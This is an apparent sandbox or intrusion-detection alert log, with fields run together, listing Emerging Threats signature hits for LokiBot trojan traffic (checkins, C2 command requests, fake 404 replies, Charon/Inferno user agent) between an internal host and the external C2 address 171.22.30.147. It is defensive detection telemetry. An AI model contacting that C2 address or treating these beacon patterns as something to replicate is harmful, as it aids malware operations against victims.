              192.168.2.3171.22.30.14749814802024318 01/05/23-08:52:44.953030TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749875802024313 01/05/23-08:53:02.907470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499372025483 01/05/23-08:53:21.171934TCP2025483ET TROJAN LokiBot Fake 404 Response8049937171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497092025483 01/05/23-08:52:11.338117TCP2025483ET TROJAN LokiBot Fake 404 Response8049709171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749842802024313 01/05/23-08:52:54.011182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750038802021641 01/05/23-08:53:51.593310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749825802025381 01/05/23-08:52:47.903129TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749842802024318 01/05/23-08:52:54.011182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749700802021641 01/05/23-08:52:07.351938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749760802825766 01/05/23-08:52:28.304789TCP2825766ETPRO TROJAN LokiBot Checkin M24976080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749820802025381 01/05/23-08:52:46.558490TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749847802024318 01/05/23-08:52:55.372015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499782025483 01/05/23-08:53:34.236429TCP2025483ET TROJAN LokiBot Fake 404 Response8049978171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750033802021641 01/05/23-08:53:50.199257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749978802825766 01/05/23-08:53:34.155329TCP2825766ETPRO TROJAN LokiBot Checkin M24997880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499892025483 01/05/23-08:53:37.188693TCP2025483ET TROJAN LokiBot Fake 404 Response8049989171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749765802825766 01/05/23-08:52:29.748218TCP2825766ETPRO TROJAN LokiBot Checkin M24976580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749705802021641 01/05/23-08:52:09.363911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749918802021641 01/05/23-08:53:15.920283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749973802825766 01/05/23-08:53:32.829653TCP2825766ETPRO TROJAN LokiBot Checkin M24997380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500422025483 01/05/23-08:53:52.766868TCP2025483ET TROJAN LokiBot Fake 404 Response8050042171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499672025483 01/05/23-08:53:31.314561TCP2025483ET TROJAN LokiBot Fake 404 Response8049967171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749729802024313 01/05/23-08:52:19.554519TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749757802024318 01/05/23-08:52:27.498112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749913802021641 01/05/23-08:53:14.593137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750024802024318 01/05/23-08:53:47.812882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749729802024318 01/05/23-08:52:19.554519TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749748802024318 01/05/23-08:52:24.879047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750007802025381 01/05/23-08:53:41.829015TCP2025381ET TROJAN LokiBot Checkin5000780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500832025483 01/05/23-08:54:03.870341TCP2025483ET TROJAN LokiBot Fake 404 Response8050083171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498712025483 01/05/23-08:53:01.907904TCP2025483ET TROJAN LokiBot Fake 404 Response8049871171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498742025483 01/05/23-08:53:02.704853TCP2025483ET TROJAN LokiBot Fake 404 Response8049874171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500012025483 01/05/23-08:53:40.323123TCP2025483ET TROJAN LokiBot Fake 404 Response8050001171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749945802825766 01/05/23-08:53:23.275014TCP2825766ETPRO TROJAN LokiBot Checkin M24994580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749850802825766 01/05/23-08:52:56.172529TCP2825766ETPRO TROJAN LokiBot Checkin M24985080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749946802021641 01/05/23-08:53:23.547730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749785802024318 01/05/23-08:52:36.951784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749768802025381 01/05/23-08:52:30.564042TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749785802024313 01/05/23-08:52:36.951784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750026802025381 01/05/23-08:53:48.341265TCP2025381ET TROJAN LokiBot Checkin5002680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750043802024318 01/05/23-08:53:52.949985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749748802024313 01/05/23-08:52:24.879047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749822802825766 01/05/23-08:52:47.112264TCP2825766ETPRO TROJAN LokiBot Checkin M24982280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750024802024313 01/05/23-08:53:47.812882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749917802825766 01/05/23-08:53:15.635846TCP2825766ETPRO TROJAN LokiBot Checkin M24991780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499972025483 01/05/23-08:53:39.292691TCP2025483ET TROJAN LokiBot Fake 404 Response8049997171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749971802025381 01/05/23-08:53:32.299331TCP2025381ET TROJAN LokiBot Checkin4997180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749927802021641 01/05/23-08:53:18.426652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498332025483 01/05/23-08:52:50.173155TCP2025483ET TROJAN LokiBot Fake 404 Response8049833171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749974802021641 01/05/23-08:53:33.106432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749987802825766 01/05/23-08:53:36.549688TCP2825766ETPRO TROJAN LokiBot Checkin M24998780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750071802024313 01/05/23-08:54:00.426977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498412025483 01/05/23-08:52:53.827492TCP2025483ET TROJAN LokiBot Fake 404 Response8049841171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750063802025381 01/05/23-08:53:58.331391TCP2025381ET TROJAN LokiBot Checkin5006380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749787802025381 01/05/23-08:52:37.509502TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498222025483 01/05/23-08:52:47.191039TCP2025483ET TROJAN LokiBot Fake 404 Response8049822171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750080802024313 01/05/23-08:54:02.852694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500122025483 01/05/23-08:53:43.270055TCP2025483ET TROJAN LokiBot Fake 404 Response8050012171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498602025483 01/05/23-08:52:58.960095TCP2025483ET TROJAN LokiBot Fake 404 Response8049860171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750080802024318 01/05/23-08:54:02.852694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750054802025381 01/05/23-08:53:55.890469TCP2025381ET TROJAN LokiBot Checkin5005480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750071802024318 01/05/23-08:54:00.426977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498632025483 01/05/23-08:52:59.783070TCP2025483ET TROJAN LokiBot Fake 404 Response8049863171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749943802025381 01/05/23-08:53:22.718924TCP2025381ET TROJAN LokiBot Checkin4994380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749759802025381 01/05/23-08:52:28.024665TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498002025483 01/05/23-08:52:41.187781TCP2025483ET TROJAN LokiBot Fake 404 Response8049800171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749805802024318 01/05/23-08:52:42.467353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498822025483 01/05/23-08:53:04.870118TCP2025483ET TROJAN LokiBot Fake 404 Response8049882171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498852025483 01/05/23-08:53:05.656001TCP2025483ET TROJAN LokiBot Fake 404 Response8049885171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750009802825766 01/05/23-08:53:42.368696TCP2825766ETPRO TROJAN LokiBot Checkin M25000980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749955802021641 01/05/23-08:53:25.989714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749803802825766 01/05/23-08:52:41.905218TCP2825766ETPRO TROJAN LokiBot Checkin M24980380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749828802021641 01/05/23-08:52:48.735651TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750052802024318 01/05/23-08:53:55.369344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750052802024313 01/05/23-08:53:55.369344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750028802825766 01/05/23-08:53:48.853917TCP2825766ETPRO TROJAN LokiBot Checkin M25002880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749888802825766 01/05/23-08:53:06.392338TCP2825766ETPRO TROJAN LokiBot Checkin M24988880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749776802024318 01/05/23-08:52:33.619524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750035802025381 01/05/23-08:53:50.741604TCP2025381ET TROJAN LokiBot Checkin5003580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749805802024313 01/05/23-08:52:42.467353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750082802025381 01/05/23-08:54:03.532238TCP2025381ET TROJAN LokiBot Checkin5008280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749776802024313 01/05/23-08:52:33.619524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749799802021641 01/05/23-08:52:40.836883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749989802024318 01/05/23-08:53:37.099082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749702802025381 01/05/23-08:52:08.155254TCP2025381ET TROJAN LokiBot Checkin4970280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749757802024313 01/05/23-08:52:27.498112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749960802024313 01/05/23-08:53:28.475539TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749960802024318 01/05/23-08:53:28.475539TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749770802021641 01/05/23-08:52:31.112136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749915802025381 01/05/23-08:53:15.112176TCP2025381ET TROJAN LokiBot Checkin4991580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498302025483 01/05/23-08:52:49.327790TCP2025483ET TROJAN LokiBot Fake 404 Response8049830171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749983802021641 01/05/23-08:53:35.478290TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749831802825766 01/05/23-08:52:49.539016TCP2825766ETPRO TROJAN LokiBot Checkin M24983180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749714802021641 01/05/23-08:52:13.349412TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749957802025381 01/05/23-08:53:26.768134TCP2025381ET TROJAN LokiBot Checkin4995780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500232025483 01/05/23-08:53:47.629813TCP2025483ET TROJAN LokiBot Fake 404 Response8050023171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749713802825766 01/05/23-08:52:12.826844TCP2825766ETPRO TROJAN LokiBot Checkin M24971380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749775802021641 01/05/23-08:52:32.683406TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749844802025381 01/05/23-08:52:54.549139TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749869802825766 01/05/23-08:53:01.298022TCP2825766ETPRO TROJAN LokiBot Checkin M24986980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749808802825766 01/05/23-08:52:43.325468TCP2825766ETPRO TROJAN LokiBot Checkin M24980880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749729802021641 01/05/23-08:52:19.554519TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749757802021641 01/05/23-08:52:27.498112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749989802024313 01/05/23-08:53:37.099082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749862802025381 01/05/23-08:52:59.436708TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498902025483 01/05/23-08:53:07.016304TCP2025483ET TROJAN LokiBot Fake 404 Response8049890171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749941802024313 01/05/23-08:53:22.165125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749816802025381 01/05/23-08:52:45.483412TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749939802025381 01/05/23-08:53:21.632432TCP2025381ET TROJAN LokiBot Checkin4993980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749941802024318 01/05/23-08:53:22.165125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749747802021641 01/05/23-08:52:24.577114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749898802021641 01/05/23-08:53:09.845609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750014802021641 01/05/23-08:53:43.719267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749801802025381 01/05/23-08:52:41.371912TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749742802021641 01/05/23-08:52:23.189713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750070802021641 01/05/23-08:54:00.166694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497582025483 01/05/23-08:52:27.844272TCP2025483ET TROJAN LokiBot Fake 404 Response8049758171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749785802021641 01/05/23-08:52:36.951784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749811802025381 01/05/23-08:52:44.140113TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749897802825766 01/05/23-08:53:09.055046TCP2825766ETPRO TROJAN LokiBot Checkin M24989780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749819802021641 01/05/23-08:52:46.293306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749834802025381 01/05/23-08:52:50.512718TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498552025483 01/05/23-08:52:57.599001TCP2025483ET TROJAN LokiBot Fake 404 Response8049855171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750024802021641 01/05/23-08:53:47.812882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749711802025381 01/05/23-08:52:12.061796TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749719802021641 01/05/23-08:52:15.841614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749929802025381 01/05/23-08:53:18.948979TCP2025381ET TROJAN LokiBot Checkin4992980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498442025483 01/05/23-08:52:54.638029TCP2025483ET TROJAN LokiBot Fake 404 Response8049844171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499862025483 01/05/23-08:53:36.369726TCP2025483ET TROJAN LokiBot Fake 404 Response8049986171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750042802021641 01/05/23-08:53:52.687057TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749906802025381 01/05/23-08:53:12.686115TCP2025381ET TROJAN LokiBot Checkin4990680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749899802024318 01/05/23-08:53:10.169881TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750010802024318 01/05/23-08:53:42.643021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749899802024313 01/05/23-08:53:10.169881TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749856802024313 01/05/23-08:52:57.793570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749892802825766 01/05/23-08:53:07.470439TCP2825766ETPRO TROJAN LokiBot Checkin M24989280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750079802825766 01/05/23-08:54:02.588823TCP2825766ETPRO TROJAN LokiBot Checkin M25007980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749806802025381 01/05/23-08:52:42.779655TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749846802825766 01/05/23-08:52:55.097334TCP2825766ETPRO TROJAN LokiBot Checkin M24984680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749780802021641 01/05/23-08:52:35.511333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749715802024313 01/05/23-08:52:14.021138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749866802024313 01/05/23-08:53:00.520534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749710802024313 01/05/23-08:52:11.662757TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499152025483 01/05/23-08:53:15.200997TCP2025483ET TROJAN LokiBot Fake 404 Response8049915171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749710802024318 01/05/23-08:52:11.662757TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749866802024318 01/05/23-08:53:00.520534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749959802825766 01/05/23-08:53:28.075379TCP2825766ETPRO TROJAN LokiBot Checkin M24995980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749828802024313 01/05/23-08:52:48.735651TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749872802025381 01/05/23-08:53:02.084337TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749724802021641 01/05/23-08:52:18.098497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749794802024313 01/05/23-08:52:39.439392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749828802024318 01/05/23-08:52:48.735651TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499042025483 01/05/23-08:53:12.229759TCP2025483ET TROJAN LokiBot Fake 404 Response8049904171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750052802021641 01/05/23-08:53:55.369344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749741802825766 01/05/23-08:52:22.916909TCP2825766ETPRO TROJAN LokiBot Checkin M24974180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749794802024318 01/05/23-08:52:39.439392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749818802825766 01/05/23-08:52:46.013246TCP2825766ETPRO TROJAN LokiBot Checkin M24981880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749894802024313 01/05/23-08:53:08.006895TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749985802025381 01/05/23-08:53:36.027311TCP2025381ET TROJAN LokiBot Checkin4998580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749752802021641 01/05/23-08:52:26.039085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750080802021641 01/05/23-08:54:02.852694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749813802825766 01/05/23-08:52:44.686594TCP2825766ETPRO TROJAN LokiBot Checkin M24981380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749894802024318 01/05/23-08:53:08.006895TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750010802024313 01/05/23-08:53:42.643021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749912802825766 01/05/23-08:53:14.329479TCP2825766ETPRO TROJAN LokiBot Checkin M24991280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749705802024318 01/05/23-08:52:09.363911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749950802021641 01/05/23-08:53:24.624259TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750057802024313 01/05/23-08:53:56.743180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750077802025381 01/05/23-08:54:02.067623TCP2025381ET TROJAN LokiBot Checkin5007780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750049802025381 01/05/23-08:53:54.543372TCP2025381ET TROJAN LokiBot Checkin5004980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499262025483 01/05/23-08:53:18.232650TCP2025483ET TROJAN LokiBot Fake 404 Response8049926171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749997802825766 01/05/23-08:53:39.208772TCP2825766ETPRO TROJAN LokiBot Checkin M24999780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749733802024318 01/05/23-08:52:20.679095TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750000802024318 01/05/23-08:53:39.996140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750067802024318 01/05/23-08:53:59.373237TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749733802024313 01/05/23-08:52:20.679095TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749851802021641 01/05/23-08:52:56.435777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749969802825766 01/05/23-08:53:31.782144TCP2825766ETPRO TROJAN LokiBot Checkin M24996980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750000802024313 01/05/23-08:53:39.996140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750029802024318 01/05/23-08:53:49.112211TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749715802024318 01/05/23-08:52:14.021138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750006802024313 01/05/23-08:53:41.552586TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749963802825766 01/05/23-08:53:30.141323TCP2825766ETPRO TROJAN LokiBot Checkin M24996380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749940802825766 01/05/23-08:53:21.893765TCP2825766ETPRO TROJAN LokiBot Checkin M24994080192.168.2.3171.22.30.147
